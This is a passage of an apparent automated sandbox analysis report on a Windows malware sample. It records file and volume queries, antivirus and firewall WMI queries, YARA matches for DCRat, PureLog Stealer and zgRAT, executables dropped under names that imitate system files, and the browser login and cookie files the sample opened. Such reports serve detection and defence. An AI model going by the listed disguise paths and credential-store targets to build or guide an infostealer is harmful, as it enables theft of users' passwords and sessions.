                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe VolumeInformation
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeQueries volume information: C:\Program Files (x86)\Windows NT\smartscreen.exe VolumeInformation
                            Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exeQueries volume information: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe VolumeInformation
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeQueries volume information: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe VolumeInformation
                            Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe VolumeInformation
                            Source: C:\Program Files (x86)\Windows NT\smartscreen.exeQueries volume information: C:\Program Files (x86)\Windows NT\smartscreen.exe VolumeInformation
                            Source: C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe PID: 7416, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: services.exe PID: 5344, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe.130000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.1655633091.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\smartscreen.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, type: DROPPED
                            Yara detected zgRAT
                            Source: Yara matchFile source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe.130000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows NT\smartscreen.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, type: DROPPED
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                            Remote Access Functionality

                            barindex
                            Yara detected DCRat
                            Source: Yara matchFile source: 00000000.00000002.1744220158.00000000127A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe PID: 7416, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: services.exe PID: 5344, type: MEMORYSTR
                            Yara detected PureLog Stealer
                            Source: Yara matchFile source: 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe, type: SAMPLE
